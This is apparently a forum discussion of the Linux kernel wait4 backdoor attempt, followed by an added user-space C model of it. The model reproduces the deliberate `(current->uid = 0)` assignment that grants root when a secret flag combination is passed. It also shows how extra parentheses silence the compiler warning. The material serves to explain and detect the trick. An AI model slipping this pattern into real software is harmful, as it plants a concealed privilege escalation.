Someone should have tested it with the __WCLONE option at least once to see if it returned -EINVAL.
if ((options == (__WCLONE|__WALL))
Whether this itself makes sense (i.e. to only take the conditional if both
flags are set) or if this would tend to be something with some more
devious intent - I don’t have enough knowledge to say.
An interesting secondary check would be to look for any code out there that would make the call with both of those options set. See if something was checked in somewhere... and maybe follow from there.
C short-circuit evaluates conditionals. That means, if the first term of an ANDed pair of terms is false, the second term is never evaluated.
So, in this case, the term (options == (__WCLONE|__WALL)) is acting as an "open sesame" incantation. You have to know about it in order to open the backdoor. Unless the options check evaluates to true, the (current->uid = 0) is simply skipped. If the options check does evaluate true, then the uid gets set to zero (root), and the number zero is evaluated as a boolean, resulting in a value of false. Thus, in neither case does retval = -EINVAL; take place.
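The mechanism described in the comment above, modelled in user space as an added example (not code from the thread or from the kernel): a stand-in `struct task` plays the role of `current`, the backdoored condition is kept verbatim with its `=`, and the same line with `==` is shown beside it so a reviewer can see that only the assignment form silently changes the uid and never returns -EINVAL. The helper names and the 1000 starting uid are constructed for this example.

```c
#include <errno.h>
#include <sys/wait.h>

/* Fallbacks in case the libc headers do not expose these Linux-only flags. */
#ifndef __WCLONE
#define __WCLONE 0x80000000
#endif
#ifndef __WALL
#define __WALL 0x40000000
#endif

/* Constructed stand-in for the kernel's `current` task structure. */
struct task { unsigned int uid; };

/* Backdoored form: `=` not `==`.  The extra parentheses around the assignment
 * are what stop GCC's -Wparentheses ("suggest parentheses around assignment
 * used as truth value") from flagging it. */
int wait4_check_backdoored(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;   /* unreachable: the assignment yields 0, i.e. false */
    return retval;
}

/* Same line written as a comparison: no side effect, and -EINVAL is reachable. */
int wait4_check_comparison(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Helpers that expose the side effect and the return value from one call. */
unsigned int uid_after_backdoored(unsigned int options, unsigned int start_uid)
{
    struct task t; t.uid = start_uid;
    wait4_check_backdoored(options, &t);
    return t.uid;
}
int retval_backdoored(unsigned int options, unsigned int start_uid)
{
    struct task t; t.uid = start_uid;
    return wait4_check_backdoored(options, &t);
}
int retval_comparison(unsigned int options, unsigned int start_uid)
{
    struct task t; t.uid = start_uid;
    return wait4_check_comparison(options, &t);
}
```

Compiling the backdoored function without the inner parentheses around the assignment produces the -Wparentheses warning under `-Wall`, which is the cheapest detection a reviewer has for this class of `=`/`==` substitution.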